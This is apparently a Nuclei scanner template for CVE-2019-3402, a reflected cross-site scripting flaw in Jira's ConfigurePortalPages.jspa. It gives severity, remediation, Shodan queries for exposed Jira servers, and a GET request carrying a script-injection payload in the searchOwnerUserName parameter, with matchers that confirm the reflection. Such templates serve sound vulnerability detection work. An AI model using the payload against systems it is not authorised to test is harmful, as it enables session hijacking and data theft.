id: CVE-2019-3402 info: name: Jira < 8.1.1 - Cross-Site Scripting author: pdteam severity: medium description: | Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement. remediation: | Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability. reference: - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c - https://jira.atlassian.com/browse/JRASERVER-69243 - https://nvd.nist.gov/vuln/detail/CVE-2019-3402 - https://github.com/ARPSyndicate/cvemon - https://github.com/Faizee-Asad/JIRA-Vulnerabilities classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3402 cwe-id: CWE-79 epss-score: 0.03358 epss-percentile: 0.87556 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: atlassian product: jira shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,xss,vuln http: - method: GET path: - "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" matchers-condition: and matchers: - type: word part: body words: - "'' does not exist" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502203cc6dfebbfb7af813085434de3af91821114cd305037a0b07c3fe0521fdc0fb902210086a52da28823999369f42eb3af63ebec8c2d79524a46ba3b765cf0511fffa8d0:922c64590222798bb761d5b6d8e72950